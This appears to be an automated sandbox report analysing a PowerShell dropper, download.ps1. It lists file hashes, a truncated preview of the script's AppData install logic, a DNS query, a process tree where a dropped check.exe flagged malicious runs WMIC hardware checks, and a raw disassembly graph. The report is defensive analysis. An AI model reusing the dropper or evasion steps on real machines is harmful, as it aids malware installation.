                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6222
                                                                                                                                                                                                                                      Entropy (8bit):3.698526484519463
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:FmOdyBCubU2K+lzukvhkvklCywan2xVeL2lzFSogZodRVeL2l/FSogZoJ1:4M6CLoskvhkvCCtnVeL2WHAVeL2CHS
                                                                                                                                                                                                                                      MD5:25B7C35FC8FEAA9D867A6FF4FE79FEB3
                                                                                                                                                                                                                                      SHA1:3195E2B099A41817818B40FA74A5B93177A8DF39
                                                                                                                                                                                                                                      SHA-256:56F5391958C28E448C618ECCDA9A1D4474149D7E1873061BD5432C38CE881AC7
                                                                                                                                                                                                                                      SHA-512:0F1A7BEB4E4598457CD012B1A8808D7CC859D9AC41013C626D207BB5E5AE27AF4848A6EEE97EFA2045A73ED7375322F2466C274DD06DC0ECA33104DDFEBCFA2C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:...................................FL..................F.".. ...d.......~.%kH..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....o..!kH..M..%kH......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.-....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.-..Roaming.@......DWSl.Y.-....C........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.-....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y.-....E.....................v L.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.-....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.-....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.-....q...........
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38734342
                                                                                                                                                                                                                                      Entropy (8bit):7.995836813060236
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:786432:R+gX4BMdhwzTQXR5FbPp6FcSS5U/LT2KzVyPVLBdebXMb8VH/zEa:TXGMK4XR3bLSCU/+6yPl3ebcBa
                                                                                                                                                                                                                                      MD5:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                      SHA1:0E8926AF0ED2D77F193775E682F0A17B7E11B9A1
                                                                                                                                                                                                                                      SHA-256:BE4BEE2FEDE8B2FAC9D205B935AE47505B5168F675650F520BBE444A2E30F75F
                                                                                                                                                                                                                                      SHA-512:C2B518335A1458DB3A94B02CAD0814611F68F2516048F321CD182C831009021350FDBE08D5FEB70EC7C5032427E89FAFA3CF42526DC01D380DB57165E12FD307
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38465733
                                                                                                                                                                                                                                      Entropy (8bit):7.998255215093817
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:786432:vwUDDc8/7rfgCeSLeWcabNMCssC5IcKp5chaRZqQeedp/1HgytX8PKSQu:pDdPISCNa+1sMIcqcgRwQ7b/1H/t0Qu
                                                                                                                                                                                                                                      MD5:B3FD01FF7DB8CB2BECFA3D9A89DD9C19
                                                                                                                                                                                                                                      SHA1:2B11272D4FBB67C2EA9321FE1C161B69E9203F95
                                                                                                                                                                                                                                      SHA-256:572EDC3BCC2DD32CB200C7247310FA2DF37F2C9ADF7AE1C3E39252A29A4B3095
                                                                                                                                                                                                                                      SHA-512:73CAFAF71A1F9AFB2B93446BFD056DB0E0E9680FEF36D033DEB5D5C9E4CF9FB7AACB50C38790FCBB5BB5B7C36DD76CE0B18F7FDE3E0FC58939BDCF06A88BB6AB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                      Entropy (8bit):4.421598146389321
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:LSvfpi6ceLP/9skLmb0OTaWSPHaJG8nAgeMZMMhA2fX4WABlEnNk0uhiTw:2vloTaW+EZMM6DFyy03w
                                                                                                                                                                                                                                      MD5:367AB8153411EC5AEC0E12658856D401
                                                                                                                                                                                                                                      SHA1:0FDC70308829C9F65810B7D0DD2BB7AEBFFBD715
                                                                                                                                                                                                                                      SHA-256:29852648BDF09036F924EA5553FAE19346D3F5DFE91EE66F296520541C6CCD10
                                                                                                                                                                                                                                      SHA-512:715C6468970293D7FED3C7AF2FA5BBA637A432462881E0B7457109B1A47AF4D6C538643FFBF83F5B3FBAA330356B8F2EB051203538436242A178DB1A9C3E86D6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                      Entropy (8bit):5.998968435407651
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                        File name:download.ps1
                                                                                                                                                                                                                                        File size:51'289'381 bytes
                                                                                                                                                                                                                                        MD5:aa53e9e42c8f90023dc846e2cb391fc0
                                                                                                                                                                                                                                        SHA1:7508cfcd899cfe941a85d085d847b74958a93bce
                                                                                                                                                                                                                                        SHA256:4af7ee1bbb06bf40d82f8d6c50d8624caeebd2e61fb2af97d9f8d5fe35c0d3ed
                                                                                                                                                                                                                                        SHA512:f852b3bb667cb21c6d3679cf2c188dfb285978e9c7fb1aa658988a0aec979dcfe7887ac9f88976c8a34346b91b6a259997122832890f0395a89b7838aa5d6383
                                                                                                                                                                                                                                        SSDEEP:49152:RrYBxTqVwuVJDPYNDnfOKjbKbH65eXId9YUOTf35/B5WvkskecJ72ecOrukSd5Wu:I
                                                                                                                                                                                                                                        TLSH:41B73320AF6A6DBA0A7CC239607F6F1D1BB00F95884CE5EB57E578C7025FB81451B878
                                                                                                                                                                                                                                        File Content Preview:${random_error_action_preference}="Stop";Set-Location $Env:AppData;${random_install_path}="$Env:AppData\UvDdFNOw";if(Test-Path ${random_install_path}){if(Test-Path "$Env:AppData\IJWVosrT.txt"){Remove-Item "$Env:AppData\IJWVosrT.txt"};Exit};$domain=(Get-Wm
                                                                                                                                                                                                                                        Icon Hash:3270d6baae77db44
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 7, 2024 06:45:30.714891911 CET | 64240 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 06:45:30.852531910 CET | 53 | 64240 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 7, 2024 06:45:30.714891911 CET | 192.168.2.5 | 1.1.1.1 | 0x918 | Standard query (0) | nodejs.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 7, 2024 06:45:30.852531910 CET | 1.1.1.1 | 192.168.2.5 | 0x918 | No error (0) | nodejs.org |  | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 06:45:30.852531910 CET | 1.1.1.1 | 192.168.2.5 | 0x918 | No error (0) | nodejs.org |  | 104.20.22.46 | A (IP address) | IN (0x0001) | false

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:00:44:56
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:00:44:56
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:00:45:14
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:00:45:21
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:00:45:26
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:00:45:27
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                                                        Imagebase:0x7ff627bd0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:00:45:27
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:00:45:27
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                                                        Imagebase:0x7ff61c4e0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:00:45:33
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 1520 -s 892
                                                                                                                                                                                                                                        Imagebase:0x7ff67e620000
                                                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

Target ID:13
Start time:00:45:35
Start date:07/12/2024
Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Imagebase:0x7ff7124f0000
File size:38'734'342 bytes
MD5 hash:00152720A2C1C6969E3581E2DABC6702
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:14
Start time:00:45:35
Start date:07/12/2024
Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Imagebase:0x7ff7124f0000
File size:38'734'342 bytes
MD5 hash:00152720A2C1C6969E3581E2DABC6702
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:00:45:41
Start date:07/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:0x7ff627bd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:00:45:41
Start date:07/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:00:45:42
Start date:07/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic computersystem get manufacturer
Imagebase:0x7ff6a5670000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:00:45:44
Start date:07/12/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 3608 -s 968
Imagebase:0x7ff67e620000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:00:45:45
Start date:07/12/2024
Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Imagebase:0x7ff7124f0000
File size:38'734'342 bytes
MD5 hash:00152720A2C1C6969E3581E2DABC6702
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:00:45:50
Start date:07/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Imagebase:0x7ff627bd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:00:45:50
Start date:07/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:00:45:50
Start date:07/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic computersystem get manufacturer
Imagebase:0x7ff61c4e0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:00:45:53
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 5300 -s 932
                                                                                                                                                                                                                                        Imagebase:0x7ff67e620000
                                                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:10.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:17.1%
                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                          Total number of Limit Nodes:34
19806 7ff71250a948 __free_lconv_num 11 API calls 19805->19806 19807 7ff71250b061 19806->19807 19808 7ff71250a948 __free_lconv_num 11 API calls 19807->19808 19809 7ff71250b06e 19808->19809 19810 7ff71250a948 __free_lconv_num 11 API calls 19809->19810 19811 7ff71250b07b 19810->19811 19812 7ff71250a948 __free_lconv_num 11 API calls 19811->19812 19813 7ff71250b088 19812->19813 19814 7ff71250a948 __free_lconv_num 11 API calls 19813->19814 19815 7ff71250b095 19814->19815 19816 7ff71250a948 __free_lconv_num 11 API calls 19815->19816 19817 7ff71250b0a5 19816->19817 19818 7ff71250a948 __free_lconv_num 11 API calls 19817->19818 19819 7ff71250b0b5 19818->19819 19824 7ff71250ae94 19819->19824 19838 7ff7125102d8 EnterCriticalSection 19824->19838 19551 7ff7124fcb50 19552 7ff7124fcb60 19551->19552 19568 7ff712509ba8 19552->19568 19554 7ff7124fcb6c 19574 7ff7124fce48 19554->19574 19556 7ff7124fd12c 7 API calls 19558 7ff7124fcc05 19556->19558 19557 7ff7124fcb84 _RTC_Initialize 19566 7ff7124fcbd9 19557->19566 19579 7ff7124fcff8 19557->19579 19560 7ff7124fcb99 19582 7ff712509014 19560->19582 19566->19556 19567 7ff7124fcbf5 19566->19567 19569 7ff712509bb9 19568->19569 19570 7ff712504f08 _get_daylight 11 API calls 19569->19570 19571 7ff712509bc1 19569->19571 19572 7ff712509bd0 19570->19572 19571->19554 19573 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 19572->19573 19573->19571 19575 7ff7124fce59 19574->19575 19578 7ff7124fce5e __scrt_release_startup_lock 19574->19578 19576 7ff7124fd12c 7 API calls 19575->19576 19575->19578 19577 7ff7124fced2 19576->19577 19578->19557 19607 7ff7124fcfbc 19579->19607 19581 7ff7124fd001 19581->19560 19583 7ff7124fcba5 19582->19583 19584 7ff712509034 19582->19584 19583->19566 19606 7ff7124fd0cc InitializeSListHead 19583->19606 19585 7ff71250903c 19584->19585 19586 7ff712509052 GetModuleFileNameW 19584->19586 19587 7ff712504f08 _get_daylight 11 API calls 19585->19587 19590 7ff71250907d 19586->19590 19588 7ff712509041 19587->19588 19589 7ff71250a8e0 
_invalid_parameter_noinfo 37 API calls 19588->19589 19589->19583 19622 7ff712508fb4 19590->19622 19593 7ff7125090c5 19594 7ff712504f08 _get_daylight 11 API calls 19593->19594 19595 7ff7125090ca 19594->19595 19596 7ff71250a948 __free_lconv_num 11 API calls 19595->19596 19596->19583 19597 7ff7125090ff 19599 7ff71250a948 __free_lconv_num 11 API calls 19597->19599 19598 7ff7125090dd 19598->19597 19600 7ff71250912b 19598->19600 19601 7ff712509144 19598->19601 19599->19583 19602 7ff71250a948 __free_lconv_num 11 API calls 19600->19602 19604 7ff71250a948 __free_lconv_num 11 API calls 19601->19604 19603 7ff712509134 19602->19603 19605 7ff71250a948 __free_lconv_num 11 API calls 19603->19605 19604->19597 19605->19583 19608 7ff7124fcfd6 19607->19608 19610 7ff7124fcfcf 19607->19610 19611 7ff71250a1ec 19608->19611 19610->19581 19614 7ff712509e28 19611->19614 19621 7ff7125102d8 EnterCriticalSection 19614->19621 19623 7ff712508fcc 19622->19623 19624 7ff712509004 19622->19624 19623->19624 19625 7ff71250eb98 _get_daylight 11 API calls 19623->19625 19624->19593 19624->19598 19626 7ff712508ffa 19625->19626 19627 7ff71250a948 __free_lconv_num 11 API calls 19626->19627 19627->19624 19628 7ff71250c520 19639 7ff7125102d8 EnterCriticalSection 19628->19639 20482 7ff7125116b0 20493 7ff7125173e4 20482->20493 20494 7ff7125173f1 20493->20494 20495 7ff71250a948 __free_lconv_num 11 API calls 20494->20495 20496 7ff71251740d 20494->20496 20495->20494 20497 7ff71250a948 __free_lconv_num 11 API calls 20496->20497 20498 7ff7125116b9 20496->20498 20497->20496 20499 7ff7125102d8 EnterCriticalSection 20498->20499 16787 7ff7124fcc3c 16808 7ff7124fce0c 16787->16808 16790 7ff7124fcd88 16962 7ff7124fd12c IsProcessorFeaturePresent 16790->16962 16791 7ff7124fcc58 __scrt_acquire_startup_lock 16793 7ff7124fcd92 16791->16793 16798 7ff7124fcc76 __scrt_release_startup_lock 16791->16798 16794 7ff7124fd12c 7 API calls 16793->16794 16796 7ff7124fcd9d __GetCurrentState 16794->16796 16795 7ff7124fcc9b 16797 7ff7124fcd21 
16814 7ff7124fd274 16797->16814 16798->16795 16798->16797 16951 7ff712509b2c 16798->16951 16800 7ff7124fcd26 16817 7ff7124f1000 16800->16817 16805 7ff7124fcd49 16805->16796 16958 7ff7124fcf90 16805->16958 16809 7ff7124fce14 16808->16809 16810 7ff7124fce20 __scrt_dllmain_crt_thread_attach 16809->16810 16811 7ff7124fce2d 16810->16811 16812 7ff7124fcc50 16810->16812 16811->16812 16969 7ff7124fd888 16811->16969 16812->16790 16812->16791 16996 7ff71251a4d0 16814->16996 16818 7ff7124f1009 16817->16818 16998 7ff712505484 16818->16998 16820 7ff7124f37fb 17005 7ff7124f36b0 16820->17005 16824 7ff7124fc550 _log10_special 8 API calls 16826 7ff7124f3ca7 16824->16826 16956 7ff7124fd2b8 GetModuleHandleW 16826->16956 16827 7ff7124f391b 17181 7ff7124f45c0 16827->17181 16828 7ff7124f383c 17172 7ff7124f1c80 16828->17172 16831 7ff7124f385b 17077 7ff7124f8830 16831->17077 16834 7ff7124f396a 17204 7ff7124f2710 16834->17204 16835 7ff7124f388e 16845 7ff7124f38bb __vcrt_freefls 16835->16845 17176 7ff7124f89a0 16835->17176 16838 7ff7124f395d 16839 7ff7124f3984 16838->16839 16840 7ff7124f3962 16838->16840 16841 7ff7124f1c80 49 API calls 16839->16841 17200 7ff71250004c 16840->17200 16844 7ff7124f39a3 16841->16844 16849 7ff7124f1950 115 API calls 16844->16849 16846 7ff7124f8830 14 API calls 16845->16846 16853 7ff7124f38de __vcrt_freefls 16845->16853 16846->16853 16848 7ff7124f3a0b 16850 7ff7124f89a0 40 API calls 16848->16850 16852 7ff7124f39ce 16849->16852 16851 7ff7124f3a17 16850->16851 16854 7ff7124f89a0 40 API calls 16851->16854 16852->16831 16855 7ff7124f39de 16852->16855 16859 7ff7124f390e __vcrt_freefls 16853->16859 17090 7ff7124f8940 16853->17090 16856 7ff7124f3a23 16854->16856 16857 7ff7124f2710 54 API calls 16855->16857 16858 7ff7124f89a0 40 API calls 16856->16858 16898 7ff7124f3808 __vcrt_freefls 16857->16898 16858->16859 16860 7ff7124f8830 14 API calls 16859->16860 16861 7ff7124f3a3b 16860->16861 16862 7ff7124f3b2f 16861->16862 16863 7ff7124f3a60 __vcrt_freefls 16861->16863 16864 
